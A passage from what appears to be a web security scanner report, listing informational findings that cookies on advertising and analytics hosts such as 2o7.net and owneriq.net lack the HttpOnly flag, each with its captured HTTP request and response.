bocy3PdIL58T4enH5STFqqujhseNSRnr2A+9+VO4sBOmJrHkP3OSBI5SPfECBEljsr3rfMc1HPYx2zhL4Vv/gTUDeirzONRGZT1+7lfWIpyc+j895bCkM73Cpb0YCQQvdWkhv3iYz+3u8faBHBbkKadQA0zyPzHtH63Xd9V6rfMsX7p4xMLpHFchX0M4jKIgrUfwlyFLPQMYB3mvM3iVmFzcF9L2inBeyWU9lsZI7tC65pTsyPVhf1NtNZdkMxZfskrgwDSwSwgPuupX5TgeJ8P4iT+8kman5SI0blgwfdfOt8qllPzU8IfZ1jznx90RMcWoObdvHaDszOUZ7lEpW3QM3NFGmaww8XOLnsgThSCe7MwZB82c47TUqLuCKeqtb9LJTycXnybjNiLQZPdyglSFanHImIgvH/lblsrhDMnzK5UBRVpQoFyMq6iW6N9ChO+FiCV/rKjWGAgmX5i9nMlPi22HA5ag1AMV8meFAWwnyjGSy69Cp

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP2NA44HumkHp4sxPiq7xWC7/Y18Cw1YHMTLmGU0sq3aJetGtkv45Wol0tdvAh/b6SngNrsnWV9CEMk+xEkfM0nen61A/5z+1R9Olfwa/+uGCb9KGCWYT8JqLUEQcwjhy6MqcGqTVnRoKesTa1naELxWNlZl+r+hZigxeGhWsNKi7RyenIZrasb0i+THLaSjlsB4UnTg7aueb3MJbisx+; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:55 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 941

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
var rsinetsegs=['G07608_10004','G07608_10009','G07608_10016','G07608_10017','G07608_10001'];
var rsicsl="lDlIlPlQlA";
var rsiExp=new Date((new Date(
...[SNIP]...
12.33. http://px.owneriq.net/ep  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /ep

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ep?sid%5B%5D=133789898&sid%5B%5D=133443903&sid%5B%5D=133663613&rid%5B%5D=1203653&rid%5B%5D=1203654&rid%5B%5D=1203953 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: si=3589157951140485318; gguuid=CAESECRt4BlvfnFjSL7l7K77jrU; oxuuid=7bbcd01e-f726-4eb0-8371-0cfa1038e6ef; ss=uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.uxrmm.nqhjy.12sfsa.12sizu.uxrmr.njtv7.12sfsf.12sizz; apq=.; rpq=.

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
Content-Length: 153
Content-Type: text/html
Location: http://ib.adnxs.com/pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953
Set-Cookie: ss=27g5z3.uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.27kvi5.uxrmm.nqhjy.12sfsa.12sizu.27nky2.uxrmr.njtv7.12sfsf.12sizz; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Cache-Control: max-age=20498
Date: Tue, 14 Jun 2011 12:02:41 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>
12.34. http://sales.liveperson.net/hc/12987554/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/12987554/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/12987554/?visitor=&msessionkey=&site=12987554&cmd=knockPage&page=http%3A//us.havaianas.com/MYOH.html&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=unicastTarget&javaSupport=true&id=7413710468&scriptVersion=1.1&d=1307987156748&title=Custom%20Sandals%20%7C%20Make%20Your%20Own%20Havaianas%20Flip%20flops%20%7C%20OFFICIAL%20SITE&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.havaianas.com/MYOH.html
Cookie: HumanClickKEY=7154357156437926842; LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1307987145281

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:46:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8069357929820057099; path=/hc/12987554
Set-Cookie: HumanClickACTIVE=1307987167335; expires=Tue, 14-Jun-2011 17:46:07 GMT; path=/
Content-Type: image/gif
Last-Modified: Mon, 13 Jun 2011 17:46:07 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;
12.35. http://stgapi.choicestream.com/instr/csanywhere.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stgapi.choicestream.com
Path:   /instr/csanywhere.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/csanywhere.js HTTP/1.1
Host: stgapi.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 416b7a85-3459-413f-9abb-9ac5225a9955
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
ETag: W/"84353-1300364150000"
Last-Modified: Thu, 17 Mar 2011 12:15:50 GMT
Content-Type: text/javascript
ntCoent-Length: 84353
Cache-Control: private
Content-Length: 84353
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 17:45:46 GMT
Connection: close
Set-Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 17:45:46 GMT; Path=/

/*
* Copyright (c) 2000-2011 ChoiceStream, Inc. All Rights Reserved
*/
(function(){if(window.jQuery){var _jQuery=window.jQuery}var jQuery=window.jQuery=function(selector,context){return new jQuery.
...[SNIP]...
12.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s21898508197627

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s21898508197627?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A17%201%20300&ce=UTF-8&pageName=%2Fmusic%2Fmain%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&r=http%3A%2F%2Fwww.mtv.com%2F&ch=music&events=event16&h2=music%2Fmain%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=music&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fhome%2Findex.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:24 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A894-4D61-092361A4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www49
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s23534710153471

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s23534710153471?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A15%3A27%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF5F223[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:16:29 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:16:29 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:16:29 GMT
Last-Modified: Wed, 15 Jun 2011 00:16:29 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A85D-1547-1711EEF9"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.38. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25478533639106

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25478533639106?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A18%3A36%201%20300&ce=UTF-8&pageName=%2Fonair%2Fteen_wolf%2Fseries.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&r=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&ch=onair&events=event16&h2=onair%2Fteen_wolf%2Fseries.jhtml&c5=non-member&c6=not%20logged-in&c15=teen_wolf&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=onair&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:03 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8F7-7E60-4A81F956"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.39. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25953703850973

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25953703850973?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A34%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Fgame%2Fplay.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2Fgame%2Fplay.jhtml%3FarcadeGameId%3D10325912&r=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ch=games&events=event16&h2=games%2Farcade%2Fgame%2Fplay.jhtml&c5=non-member&c6=not%20logged-in&c23=exit_path&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:35 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:35 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A917-4E09-0C2AA9D0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www88
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.40. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s26489939151797

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s26489939151797?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A28%3A16%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
